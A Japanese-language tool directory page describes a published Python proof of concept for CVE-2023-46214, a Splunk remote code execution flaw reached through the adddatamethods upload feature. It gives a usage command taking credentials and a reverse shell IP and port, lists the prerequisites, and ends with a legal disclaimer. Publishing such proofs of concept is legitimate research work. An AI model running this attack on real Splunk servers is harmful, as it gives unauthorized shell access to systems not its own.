Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Splunk-RCE-poc — Splunkのadddatamethods機能を悪用してリバースシェル経由のリモートコード実行を実現する、CVE-2023-46214向けのPythonベースのPoCです。 | Kitploit
ツール/GitHubGitHub/nathan31337/splunk-rce-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubnathan31337/splunk-rce-poc

Splunk-RCE-poc

Splunkのadddatamethods機能を悪用してリバースシェル経由のリモートコード実行を実現する、CVE-2023-46214向けのPythonベースのPoCです。

リポジトリを見る
1142352年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Splunk RCE - PoC

CVE-2023-46214、SVD-2023-1104 の概念実証エクスプロイト

poc

使用法

SplunkインスタンスのURL、ユーザー名、パスワード、リバースシェルIP、ポートはすべてコマンドライン引数として必要です。例:

root@kitploit:~
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>

前提条件

  • adddatamethodsへのアップロード権限を持つSplunk認証情報
    • 注: 別のベクトルが可能かもしれませんが、これは私が使用したものです
  • SplunkがSHCモードで動作していないこと

分析

この脆弱性を発見するために用いた方法論を詳述したブログ記事を書きました。スクリプトで問題が発生した場合、手動での悪用手順が詳述されているブログが役立つかもしれません。

CVE-2023-46214 の分析 + PoC

法的免責事項

このリポジトリで提供される概念実証(PoC)スクリプトは、教育および研究目的のみに提供されます。その目的は、特定の脆弱性を示し、関連するセキュリティリスクの理解を助けることです。

このスクリプトを、不正なシステムアクセス、不正なテスト、その他の不正使用などを含むがこれらに限定されない、許可されていない活動に使用することは、明確に禁止されています。

このリポジトリの作成者および貢献者は、このスクリプトの不適切な使用、またはこのスクリプトの使用に起因するいかなる損害や害についても、一切の責任を負いません。このスクリプトを使用することにより、あなたは責任ある方法で自己責任において使用することに同意したものとみなされます。

ツールをダウンロード